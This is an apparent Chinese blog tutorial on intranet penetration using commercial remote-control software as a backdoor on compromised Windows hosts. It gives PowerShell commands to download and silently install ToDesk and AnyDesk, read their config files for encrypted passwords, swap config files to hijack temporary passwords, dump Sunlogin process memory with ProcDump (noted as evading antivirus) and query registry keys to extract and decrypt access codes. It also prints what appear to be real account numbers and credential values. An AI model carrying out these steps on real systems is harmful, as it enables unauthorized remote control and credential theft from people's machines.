首页 > 其他分享 >内网渗透_远控

内网渗透_远控

时间:2024-06-05 16:22:49浏览次数:13  
标签:PS ToDesk exe Users 渗透 Administrator Desktop 远控

内网渗透_远控

ToDesk

ToDesk_Lite

官方最新下载地址:

https://dl.todesk.com/windows/ToDesk_Lite.exe

利用powershell建立http连接下载todesk_lite.exe

PS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -Uri "https://dl.todesk.com/windows/ToDesk_Lite.exe" -OutFile "todesk_lite.exe"

image-20240602223116010

打开todesk_lite.exe以后通过type读取默认路径的配置文件

PS C:\Users\Administrator\Desktop> .\todesk_lite.exe
PS C:\Users\Administrator\Desktop> type C:\ProgramData\ToDesk_Lite\config.ini
[ConfigInfo]
passUpdate=3
PrivateScreenLockScreen=1
autoLockScreen=1
downloadtimes=202406020
clientId=228209154
PrivateData=6147d6c6ef82a52c5f77f99f8996ec0f777df10d8114692f8cf2a37b826078fc8f09e407d88788af92c468e26dcf676eee153d2f04fec1d3a3
PluginExpiresDays=0
tempAuthPassEx=98ee5e197dc63ee7a157681ea67bcf29dc7f99510dc147ef4a65b6d08ebe3db20fc9f7881cb04972ae73009bf2d54d97bbeb2d4751a82b38
updatePassTime=20240602
language=936

image-20240602222638708

PS:Todesk_lite在每次连接完后,会自动重置连接密码

ToDesk正常程序

官方最新下载地址:

https://dl.todesk.com/windows/ToDesk.exe

# 命令行方式下载ToDesk.exe【也可以自行上传】
PS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -Uri "https://dl.todesk.com/windows/ToDesk.exe" -OutFile "ToDesk.exe"

# 静默安装,所有选项均是默认的(不过对方桌面还是会弹窗,最后一步还是需要手动确认)
PS C:\Users\Administrator\Desktop> ToDesk.exe /S

image-20240602224120739

# 通过powershell的Get-Content命令读ToDesk默认路径下的配置文件(实际情况需更改)
PS C:\Users\Administrator\Desktop> Get-Content "C:\Program Files\ToDesk\config.ini"
C:\Users\Administrator\Desktop>powershell.exe
Windows PowerShell
版权所有(C) Microsoft Corporation。保留所有权利。

安装最新的 PowerShell,了解新功能和改进!https://aka.ms/PSWindows

PS C:\Users\Administrator\Desktop> Get-Content "C:\Program Files\ToDesk\config.ini"
[ConfigInfo]
passUpdate=2
PrivateScreenLockScreen=1
autoLockScreen=0
downloadtimes=202406020
clientId=228209154
PrivateData=93c3c9f15da3175ea6683a3e7ee96bc038b3aaf8354ee50d09f8ad120e901cd4ee5d93f150f9dc5783d81ec9d04bc45a656ccce653cb5d4139
Resolution=1920x1080
isOpenTempPass=0
updatePassTime=20240602223958
language=936
isAdmissionControl=1
WeakPasswordTip=0
Version=4.7.2.1
isUpdate=0
tempAuthPassEx=3726bdbc835293e4915d9d802bb481ec5c30b38b6e4621268677e9c4d3d354b1d3f2832a7f265137f61c8784744ffbd5263a62aa79edfd6a
PresetDialogUpdateDate=2024-06-02
PresetDialogShowCount=0
UpdateFrequencyPromptBubble=0
AuthMode=1
UpdateTempPassDefault=1
LastPushTimeEx=20240602
authPassEx=1ee9acec86edb2aca5a9d854b6d50053c27e058678c2eef82ad5e62aa52e049aade553f0e020b2e34cf88d08319f2eed2f49b211a2c66c3ac1
PS C:\Users\Administrator\Desktop>


# 配置文件中
tempAuthPassEx为临时密码
authPassEx为安全密码

image-20240602225233464

获取ToDesk的连接信息

被控端ToDesk:设备代码:228 209 154、临时密码:hv0rhkt5

image-20240603105123976

主控端ToDesk:设备代码:620 499 635、临时密码:gcz80etk

image-20240603105103499

我们将被控端ToDesk的config.ini的内容复制出来,张贴到主控端的config.ini下即可现实临时密码的替换(设备代码在配置文件中,我们本地自己主控端的不会被替换掉),对没错,就这么简单

主控端替换配置文件后的效果

image-20240603110530455

image-20240603110045608

查看Todesk进程

# 通过执行 tasklist 查看当前系统是否有Todesk.exe进程
PS C:\Users\Administrator\Desktop> tasklist | Select-String -Pattern "ToDesk.exe"

# 有的话执行下方语句,获取进程运行路径
PS C:\Users\Administrator\Desktop> wmic process where "name='ToDesk.exe'" get processid,executablepath,name

image-20240602225609168

向日葵

最新版

官方最新下载地址:

https://d.oray.com/sunlogin/windows/SunloginClient_15.6.0.64434_x64.exe

向日葵强化了加密机制,将config中的信息写入到内存中

# 查看向日葵进程信息
PS C:\Users\Administrator\Desktop> tasklist /v | findstr /i sunlogin

image-20240602231629568

# 通过procdump工具将指定内存中的密码信息dump下来
procdump64.exe - accepteula - ma 进程号
PS:进程号一般选当前用户的SunloginClient.exe进程

PS C:\Users\Administrator\Desktop\Procdump> .\procdump64.exe -accepteula -ma 4276

image-20240602232043273

微软的ProcDump,可直接过免杀

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

然后将dump出来的内存数据放入winhex进行查找

在winhex中按住 ctrl+alt+x (查询十六进制数据)
查找下方数据:79616865692E323820633D636F6C6F725F65646974203E

image-20240602232337737

image-20240602232413639

比较新的版本

在向日葵 v11.1.2.38529 后,强化了加密机制,删除了配置文件 config.ini 中 的 fastcode ( 本 机 识 别 码 ) 字 段 和 encry_pwd (本机验证码)字段,而将这些敏感信息放到了注册表中(以下为一条正常安装,一条便携版),我们可以通过注册表查询使用 Sunflower_get_Password 工具即可解密。

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

image-20240603095359230

image-20240603095124165

image-20240603095321472

一款针对部分向日葵的识别码和验证码提取工具

https://github.com/wafinfo/Sunflower_get_Password?ref=pythonrepo.com

老版本

老版本的识别码和密码等,可直接读取配置文件

PS:老版本目前很难找了,就算找到了相应的应用安装也会出现各种问题,市面上已经没什么人用了。

# 安装版
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

# 便携版
C:\ProgramData\Oray\SunloginClient\config.ini

# 还有的一些杂的本版
C:\Users\Administrator\AppData\Roaming\Oray\SunloginRemote\config.ini

只有控制端

[base]
autorun=0
screenshots_path=C:\Users\Administrator\Documents\Oray\SunloginRemote
log_path=C:\Users\Administrator\AppData\Roaming\Oray\SunloginRemote\log
show_new_function=0
agent_type=0
skin=h9KQ1JLr/20=
account=17359491968
password=mwp+9HJkW1HANucZyB3HEQ==
autologin=1
slapiaddress=slapi.oray.net
hostimage=0
updatemodel=0
show_guide_download_dlg=0
show_banner_time=
show_banner=1
not_show_drag_tip=1


[account_record]
17359491968=mwp+9HJkW1HANucZyB3HEQ==

image-20240603093847698

GotoHttp

https://gotohttp.com/

image-20240603100416274

被控端

image-20240603100920134

浏览器控制端

image-20240603100951867

Anydesk

https://anydesk.com/zht

控制演示

image-20240603102520025

powershell下载

powershell.exe (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")

image-20240603103432932

获取配置文件等

通过先在本机生成的一个配置文件(注意设置好自己的密码,配置文件包括:ad.trace、service.conf、system.conf、user.conf),然后将配置文件拷贝替换到对方主机的对应文件夹下。

主要的配置文件包括:ad.trace、service.conf、system.conf、user.conf

image-20240603102939750

标签:PS,ToDesk,exe,Users,渗透,Administrator,Desktop,远控
From: https://www.cnblogs.com/carmi/p/18233259

相关文章

  • 渗透测试——工作组内网信息收集(1)
    目录1、工作组信息收集(在这里我以自己物理机win11举例)(1)用户信息(2)系统信息 (3)网络信息 (5)RDP远程桌面 (6)获取杀软信息 参考下面这个文章,找找对应的杀毒软化进程(7)代理信息​编辑 (8)WIFI密码指定获取密码 获取所有连过的wifi密码 (9)回收站信息 (10)谷歌浏览器(这个......
  • 远控免杀篇
    0x00:前言随着近两年hvv和红蓝对抗以及国家对于网络安全的重视,国内防护水平都蹭蹭上了一个台阶,不管是内部人员的技术水平提高还是防护设备的层层部署,均给了红队人员想要进一步行动设置了障碍。 通过weblogic的cve-2019-2725获取了一个,想要进一步把shell迁移到msf或者CS进行......
  • Ary自动渗透工具使用体验
    最近参与CIS大会,看到一款自动化渗透工具Ary,特点是汇聚了各种可以调用的工具。介绍工具地址 GitHub-TeraSecTeam/ary:Ary是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透。POC收集 GitHub-TeraSecTeam/poc-collection:poc-collection是对gith......
  • 渗透测试|记一次SQL注入新用法
    免责声明:由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!正文:在参加某市攻防演练的时候,发现目标站,经过一系列尝试,包括弱口令......
  • 内网渗透-在HTTP协议层面绕过WAF
    进入正题,随着安全意思增强,各企业对自己的网站也更加注重安全性。但很多web应用因为老旧,或贪图方便想以最小代价保证应用安全,就只仅仅给服务器安装waf。本次从协议层面绕过waf实验用sql注入演示,但不限于实际应用时测试sql注入(命令执行,代码执行,文件上传等测试都通用)。原理先给......
  • 如何使用Rayder组织编排漏洞侦查和渗透测试工作流
    关于RayderRayder是一款针对漏洞网络侦查和渗透测试自动化工作流工具,该工具本质上是一个命令行工具,旨在帮助广大研究人员更轻松地组织、编排和执行漏洞侦查和渗透测试工作流。Rayder允许我们在YAML文件中定义一系列功能模块,且每个模块都由要执行的命令所组成。Rayder可以帮......
  • SQLRecon:一款针对MSSQL的网络侦查与后渗透测试工具
    关于SQLReconSQLRecon是一款针对MicrosoftSQLServer的安全研究工具,该工具专为红队研究人员设计,可以帮助广大研究人员针对MSSQL执行网络侦查和后渗透利用测试。工具安装广大研究人员可以直接访问该项目的【Releases页面】下载预编译的最新版本SQLRecon。除此之外,我们还......
  • vulhub-素晴主题靶机aqua详细渗透流程
    文章目录靶机信息一、锁定靶机地址二、扫描靶机端口与服务三、SMB信息搜集四、WEB渗透1.网站目录扫描2.网页信息搜集3.文件包含漏洞五、FTP服务渗透1.knockd技术2.knock开启端口3.FTP上传反弹shell获取webshell六、后渗透提权1.webshell到普通用户2.普通用户横向提权3.......
  • 标准发布 | 反渗透和纳滤水处理膜修复再利用技术要求
    本文件由浙江大学、中华环保联合会水环境治理专业委员会提出。本文件由中华环保联合会归口。本文件主编单位:浙江大学、河南一膜环保技术有限公司、安徽精高水处理有限公司、国能龙源环保有限公司、湖南沁森高科新材料有限公司。本文件参编单位:深圳市长隆科技有限......
  • DC-1靶机渗透测试过程(个人学习)
    ​DC-1靶场下载地址:DC:1~VulnHub攻击机kali的IP地址:192.168.37.129注意靶机和攻击机的环境配置要一致一、信息收集方法一:nmap扫描方法二:arp-scan-l使用 arp-scan-l 扫描该网段内其他的IP地址效率相对快一些扫描后得到靶机的IP地址为:192.168.37.133使用nmap......